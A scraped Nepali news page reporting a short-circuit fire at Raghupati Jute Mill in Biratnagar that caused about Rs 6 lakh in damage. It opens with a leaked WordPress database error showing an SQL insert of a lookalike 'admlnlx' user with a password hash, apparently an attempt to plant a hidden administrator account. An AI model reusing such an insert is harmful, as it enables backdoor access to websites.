WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNr8xykvDuo6gJwLg6pqno/cjRpKWS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 19:54:52', '', 'admlnlx', 'admlnlx')
उर्लाबारी (मोरङ),माघ ६ –
मोरङको विराटनगर–२२ स्थित रघुपति जुट मिलमा आज बिहान आगलागी हुँदा रु छ लाख बराबरको क्षति भएको छ ।
मिलको स्पिनिङ शाखाको विद्युत् लाइन सर्ट भएर आगलागी भएको हो । आगलागीबाट चार थान स्पिनिङ मेसिन र छ टन तयारी कोप जल्दा रु छ लाख बराबरको क्षति भएको मोरङ प्रहरीले जनाएको छ । आगोलाई सोही मिलमा काम गर्ने मजदुरले नियन्त्रणमा लिएको थिए । – रासस